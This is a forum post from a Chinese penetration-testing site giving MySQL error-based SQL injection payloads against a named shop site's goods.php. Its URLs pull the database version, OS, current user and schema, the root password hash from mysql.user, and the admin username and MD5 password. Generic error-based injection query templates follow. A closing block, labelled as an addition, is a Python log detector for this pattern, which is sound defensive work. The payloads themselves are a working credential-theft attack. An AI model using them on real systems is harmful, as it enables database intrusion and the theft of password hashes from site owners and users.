中国网络渗透测试联盟

Title: Blind injection details

Author: admin    Time: 2012-9-5 14:59
Determine the version number

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database table names

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database: user_name column

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database: password column

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Obtain the admin password (md5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
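For the defender's side of the payloads above, here is an added detection example (not code from the original post) that URL-decodes request parameters and flags the count(*)/concat()/floor(rand()*2)/group by double-query pattern, which leaks the concat()'d value through MySQL's duplicate-key error; the log lines it scans are constructed.

```python
"""Detect the error-based (duplicate-key) MySQL injection pattern in web logs.
Added example, not from the original post. SAMPLE_LOG lines are constructed."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Signatures taken from the payload shapes shown in the post
_SIGNATURES = {
    "double_query": re.compile(r"count\(\*\).*floor\(rand\(\d*\)\s*\*\s*2\).*group\s+by", re.S),
    "info_schema": re.compile(r"information_schema\.(tables|columns|schemata)"),
    "mysql_user": re.compile(r"mysql\.user"),
    "server_vars": re.compile(r"@@version(_compile_os)?|\buser\(\)|\bdatabase\(\)"),
    "char_encoding": re.compile(r"\bchar\(\d+(,\d+){2,}\)"),   # char(114,111,111,116)
    "sql_comment": re.compile(r"#\s*$|--\s|/\*"),
}

def normalize(raw: str) -> str:
    """Decode twice (catches double URL encoding), collapse whitespace, lowercase."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(raw))).lower()

def scan_url(url: str) -> dict:
    """Map each query parameter to the list of signature names it matches."""
    hits = {}
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = normalize(value)
        matched = [name for name, rx in _SIGNATURES.items() if rx.search(text)]
        if matched:
            hits[key] = matched
    return hits

def is_error_based_sqli(url: str) -> bool:
    """True when the core double-query pattern appears in any parameter."""
    return any("double_query" in m for m in scan_url(url).values())

# Constructed common-log-format lines: one benign request, one carrying the payload
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Sep/2012:14:59:01 +0800] "GET /goods.php?id=352&wsid=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [05/Sep/2012:14:59:07 +0800] "GET /goods.php?id=352&wsid=1%20and%20(1,1)%3E'
    '(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20'
    '(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23 HTTP/1.1" 500 231',
]
_REQ = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def scan_log(lines):
    """Return (client_ip, {param: [signatures]}) for each flagged request."""
    flagged = []
    for line in lines:
        m = _REQ.match(line)
        if m and is_error_based_sqli(m.group(2)):
            flagged.append((m.group(1), scan_url(m.group(2))))
    return flagged
```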




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2